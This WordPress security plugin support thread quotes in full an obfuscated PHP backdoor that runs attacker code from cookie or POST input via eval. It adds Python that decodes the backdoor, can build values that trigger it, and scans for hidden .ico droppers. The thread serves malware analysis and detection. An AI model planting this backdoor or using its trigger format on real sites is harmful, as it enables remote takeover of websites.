Scan potential threats
Tagged: new threat
This topic contains 3 replies, has 2 voices, and was last updated by Steven Baron 6 years, 1 month ago.
September 30, 2018 at 5:57 am #2167
I have been fighting a continual hack on a bunch of my WP sites. Then came across your plugin and giving it a shot to see how it works. So far pretty impressed…
The majority of the attack seems to be .ICO and .PHP files. The .ICO are easy, as all I do is a file scan and delete them. The .PHP seem to be arbitrary names. Your scanner picked a bunch up as potential. For example…
wp-admin\pv3f8ux4.php contains:
<?php
// Character lookup table; every string used below is assembled from offsets into it.
$fqpee = '4-dcb\'2ypu1tlk763#nmoxav58*seH_0f9igr';
$nueyq = Array();
$nueyq[] = $fqpee[29].$fqpee[26];                                                                                        // "H*"   (pack() format: hex string -> bytes)
$nueyq[] = $fqpee[17];                                                                                                   // "#"    (field separator of the decoded payload)
$nueyq[] = $fqpee[10].$fqpee[0].$fqpee[33].$fqpee[0].$fqpee[14].$fqpee[14].$fqpee[10].$fqpee[10].$fqpee[1].$fqpee[31].$fqpee[22].$fqpee[31].$fqpee[14].$fqpee[1].$fqpee[0].$fqpee[24].$fqpee[10].$fqpee[22].$fqpee[1].$fqpee[4].$fqpee[10].$fqpee[4].$fqpee[0].$fqpee[1].$fqpee[15].$fqpee[25].$fqpee[31].$fqpee[16].$fqpee[32].$fqpee[28].$fqpee[14].$fqpee[6].$fqpee[22].$fqpee[32].$fqpee[4].$fqpee[28]; // "14947711-0a07-451a-b1b4-6803fe72afbe" (XOR key suffix)
$nueyq[] = $fqpee[3].$fqpee[20].$fqpee[9].$fqpee[18].$fqpee[11];                                                         // "count"
$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[30].$fqpee[36].$fqpee[28].$fqpee[8].$fqpee[28].$fqpee[22].$fqpee[11]; // "str_repeat"
$nueyq[] = $fqpee[28].$fqpee[21].$fqpee[8].$fqpee[12].$fqpee[20].$fqpee[2].$fqpee[28];                                   // "explode"
$nueyq[] = $fqpee[27].$fqpee[9].$fqpee[4].$fqpee[27].$fqpee[11].$fqpee[36];                                              // "substr"
$nueyq[] = $fqpee[22].$fqpee[36].$fqpee[36].$fqpee[22].$fqpee[7].$fqpee[30].$fqpee[19].$fqpee[28].$fqpee[36].$fqpee[35].$fqpee[28]; // "array_merge"
$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[12].$fqpee[28].$fqpee[18];                                            // "strlen"
$nueyq[] = $fqpee[8].$fqpee[22].$fqpee[3].$fqpee[13];                                                                    // "pack"
foreach ($nueyq[7]($_COOKIE, $_POST) as $jsipkrj => $gnufbpt) {   // array_merge($_COOKIE, $_POST): every cookie and POST field is a candidate trigger
    // substr(str_repeat($name . $key, ($len / strlen($name)) + 1), 0, $len):
    // an XOR keystream built from the parameter name followed by the key suffix.
    // (The three functions are declared inside the loop, so a second iteration
    // reached without exit() fails with a redeclaration error.)
    function xbhdvq($nueyq, $jsipkrj, $swvqcr) {
        return $nueyq[6]($nueyq[4]($jsipkrj . $nueyq[2], ($swvqcr / $nueyq[8]($jsipkrj)) + 1), 0, $swvqcr);
    }
    // pack("H*", $value): hex-decode the parameter value, warnings suppressed
    function iopoq($nueyq, $bartqre) {
        return @$nueyq[9]($nueyq[0], $bartqre);
    }
    // if count($fields) % 3 == 0: eval($fields[1]($fields[2])) and stop the request
    function cwrxi($nueyq, $bartqre) {
        $ynhwgv = $nueyq[3]($bartqre) % 3;
        if (!$ynhwgv) {
            eval($bartqre[1]($bartqre[2]));
            exit();
        }
    }
    $gnufbpt = iopoq($nueyq, $gnufbpt);
    // explode("#", $decoded ^ $keystream)
    cwrxi($nueyq, $nueyq[5]($nueyq[1], $gnufbpt ^ xbhdvq($nueyq, $jsipkrj, $nueyq[8]($gnufbpt))));
}
Is there any way that, if I submit files and code, you can add them to the threat list? Or is this just one of those things that will require manual intervention each time? Other suggestions?
While I can easily navigate to the location, it would be nice if the potential threat section had a check box to allow selection and deletion of files.
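The sample above hides every function name behind offsets into the `$fqpee` table. The following Python is an added example (my own, not the plugin's code and not from the thread) that resolves those offsets to recover the names, then replays the per-parameter decoding step so a captured cookie or POST value can be read back. `SAMPLE` is the table and the ten assignment lines copied from the post; the cookie name `wp_sess` and the two request values are constructed for the demonstration, not captured traffic.

```python
import re

# Constructed input: the character table and the $nueyq[] assignments from the
# wp-admin\pv3f8ux4.php sample quoted above (the foreach body is not needed here).
SAMPLE = r"""<?php
$fqpee = '4-dcb\'2ypu1tlk763#nmoxav58*seH_0f9igr';$nueyq = Array();
$nueyq[] = $fqpee[29].$fqpee[26];
$nueyq[] = $fqpee[17];
$nueyq[] = $fqpee[10].$fqpee[0].$fqpee[33].$fqpee[0].$fqpee[14].$fqpee[14].$fqpee[10].$fqpee[10].$fqpee[1].$fqpee[31].$fqpee[22].$fqpee[31].$fqpee[14].$fqpee[1].$fqpee[0].$fqpee[24].$fqpee[10].$fqpee[22].$fqpee[1].$fqpee[4].$fqpee[10].$fqpee[4].$fqpee[0].$fqpee[1].$fqpee[15].$fqpee[25].$fqpee[31].$fqpee[16].$fqpee[32].$fqpee[28].$fqpee[14].$fqpee[6].$fqpee[22].$fqpee[32].$fqpee[4].$fqpee[28];
$nueyq[] = $fqpee[3].$fqpee[20].$fqpee[9].$fqpee[18].$fqpee[11];
$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[30].$fqpee[36].$fqpee[28].$fqpee[8].$fqpee[28].$fqpee[22].$fqpee[11];
$nueyq[] = $fqpee[28].$fqpee[21].$fqpee[8].$fqpee[12].$fqpee[20].$fqpee[2].$fqpee[28];
$nueyq[] = $fqpee[27].$fqpee[9].$fqpee[4].$fqpee[27].$fqpee[11].$fqpee[36];
$nueyq[] = $fqpee[22].$fqpee[36].$fqpee[36].$fqpee[22].$fqpee[7].$fqpee[30].$fqpee[19].$fqpee[28].$fqpee[36].$fqpee[35].$fqpee[28];
$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[12].$fqpee[28].$fqpee[18];
$nueyq[] = $fqpee[8].$fqpee[22].$fqpee[3].$fqpee[13];
"""


def parse_table(src):
    """Return (variable name, decoded characters) of the first single-quoted PHP string."""
    m = re.search(r"\$(\w+)\s*=\s*'((?:\\.|[^'\\])*)'", src)
    if not m:
        raise ValueError("no single-quoted character table found")
    # PHP single-quoted strings only unescape \' and \\ ; everything else is literal.
    return m.group(1), re.sub(r"\\([\\'])", r"\1", m.group(2))


def resolve_strings(src):
    """Rebuild every value assembled as $table[i].$table[j]... into plaintext, in source order."""
    name, table = parse_table(src)
    expr = re.compile(r"\[\]\s*=\s*((?:\$" + re.escape(name) + r"\[\d+\]\s*\.?\s*)+);")
    out = []
    for m in expr.finditer(src):
        idx = [int(i) for i in re.findall(r"\[(\d+)\]", m.group(1))]
        out.append("".join(table[i] for i in idx))
    return out


def keystream(param_name, key, length):
    """PHP: substr(str_repeat($name . $key, ($length / strlen($name)) + 1), 0, $length)."""
    seed = (param_name + key).encode("latin-1")
    return (seed * (length // len(param_name) + 1))[:length]


def xor_stream(param_name, data, key):
    """The backdoor's string XOR; symmetric, so it also builds what a client would send."""
    return bytes(a ^ b for a, b in zip(data, keystream(param_name, key, len(data))))


def decode_parameter(param_name, hex_value, strings):
    """Replay the unpacking of one cookie/POST value. Returns (fields, would_eval)."""
    fmt, sep, key = strings[0], strings[1], strings[2]   # "H*", "#", key suffix
    if fmt != "H*":
        raise ValueError("unexpected pack() format %r" % fmt)
    data = bytes.fromhex(hex_value)                      # pack("H*", ...)
    fields = xor_stream(param_name, data, key).decode("latin-1").split(sep)
    # The sample only calls eval($fields[1]($fields[2])) when count($fields) % 3 == 0.
    return fields, len(fields) % 3 == 0


STRINGS = resolve_strings(SAMPLE)
KEY = STRINGS[2]

# Constructed request values for the demo (assumed cookie name, not captured traffic).
BENIGN = xor_stream("wp_sess", b"1#noop", KEY).hex()                 # 2 fields: ignored
ARMED = xor_stream("wp_sess", b"1#strtoupper#marker", KEY).hex()     # 3 fields: would be eval'd

if __name__ == "__main__":
    for i, s in enumerate(STRINGS):
        print("$nueyq[%d] = %r" % (i, s))
    print(decode_parameter("wp_sess", BENIGN, STRINGS))
    print(decode_parameter("wp_sess", ARMED, STRINGS))
```

Resolving the table is enough to see what the file does (hex-decode, XOR, split on `#`, `eval`), which is the part a definition or a YARA rule can key on; the decoder is only useful when the cookie or POST body was actually captured, since ordinary access logs hold neither.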
September 30, 2018 at 7:09 pm #2168
Thanks for sending me this code sample. This is another variant of a widespread threat that has popped up recently. I have updated the definition with this new variant, so my plugin should now be able to find and fix this one too. Please download the latest definition update and let me know if there's anything else.
October 1, 2018 at 3:41 am #2169
There are literally dozens of these randomly named files that are scattered throughout the sites. The code in each one is very different but seems to use the same base for encryption. With that, it seems that .ICO files are a part of the attack. I would recommend removing it from "skip files with the following extensions". Do you want me to send you more code samples for comparison?
Also, in addition to the manual removal request ability on the potential threat location, maybe you should have a "submit for evaluation" option next to the "white list" when you click on the file. This would save a lot of time reporting and get the attack code in your hands quicker. If you think it might be misused, then maybe activate that option for users that have donated, as it will validate the user and allow a little tighter control.
October 1, 2018 at 5:04 am #2170
Here is an example of 2 .ICO files from different sites that were found once I removed it from the skip files and were caught by the scanner…
wp-includes/js/thickbox/.bcb5a93b.ico
wp-content/plugins/skimlinks/.f397826e.ico
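Two of the poster's observations, randomly named PHP files in core directories and hidden .ico files that a scanner skips by extension, translate directly into a content-based sweep. This Python scanner is an added example (my own, not the plugin's detection logic) that builds a constructed stand-in for an infected install in a temporary directory and scans it twice: once with .ico in a skip list, once looking at file content regardless of extension. The file bodies, the indicator names and the 64 KB read window are assumptions for the demonstration; only the paths reuse names quoted in the thread.

```python
import os
import re
import tempfile

# Icon files start with a 6-byte ICONDIR header: reserved 0, then type 1 (.ico) or 2 (.cur).
ICON_MAGIC = (b"\x00\x00\x01\x00", b"\x00\x00\x02\x00")

# Content heuristics drawn from the samples in this thread; each name is a finding label.
INDEXED_TABLE = re.compile(rb"(?:\$\w+\[\d+\]\s*\.\s*){8,}")    # $x[29].$x[26]. ... chains
EVAL_CALL = re.compile(rb"\beval\s*\(")
REQUEST_INPUT = re.compile(rb"\$_(?:COOKIE|POST|GET|REQUEST)\b")


def scan_file(path, skip_extensions=()):
    """Return the list of indicator labels for one file, or [] if nothing matched."""
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    if ext in skip_extensions:
        return []                      # an extension skip list never looks inside the file
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)      # assumed window: droppers and real icons are both small
    findings = []
    if ext == ".ico":
        if name.startswith("."):
            findings.append("hidden-dotfile-ico")
        if not head.startswith(ICON_MAGIC):
            findings.append("ico-without-icon-header")
    if b"<?php" in head and ext != ".php":
        findings.append("php-code-in-non-php-file")
    if INDEXED_TABLE.search(head):
        findings.append("indexed-string-table-obfuscation")
    if EVAL_CALL.search(head) and REQUEST_INPUT.search(head):
        findings.append("eval-reachable-from-request-input")
    return findings


def scan_tree(root, skip_extensions=()):
    """Walk a site root; map relative path -> findings for every file with at least one."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            found = scan_file(full, skip_extensions)
            if found:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return hits


def build_sample_tree():
    """Constructed stand-in for an infected install; none of these bodies is captured content."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    table_chain = b".".join(b"$a[%d]" % (i % 3) for i in range(12))
    files = {
        # mimics the quoted pv3f8ux4.php: a $table[i].$table[j] chain and request input reaching eval
        "wp-admin/pv3f8ux4.php": b"<?php\n$a = 'abc';$n = Array();$n[] = " + table_chain
            + b";\nforeach (array_merge($_COOKIE, $_POST) as $k => $v) { eval($v); }\n",
        # hidden dotfile with the .ico name from the post, holding PHP instead of an icon
        "wp-includes/js/thickbox/.bcb5a93b.ico": b"<?php /* constructed placeholder body */\n",
        # a genuine icon: ICONDIR header, one image entry, zero-padded
        "wp-content/uploads/favicon.ico": b"\x00\x00\x01\x00\x01\x00" + b"\x00" * 32,
        "index.php": b"<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    return root


def demo():
    """Scan the constructed tree with .ico skipped (as the poster found it) and without."""
    root = build_sample_tree()
    return scan_tree(root, skip_extensions=(".ico",)), scan_tree(root)


if __name__ == "__main__":
    skipped, full = demo()
    print("with .ico skipped:", skipped)
    print("content-based:    ", full)
```

The first scan reports only the PHP dropper; the hidden .ico is invisible to it, which is the gap the poster hit. The second flags the same PHP file plus the .ico on three counts (dotfile name, no icon header, PHP tag in a non-PHP file), while the genuine favicon passes because its header is checked rather than its extension.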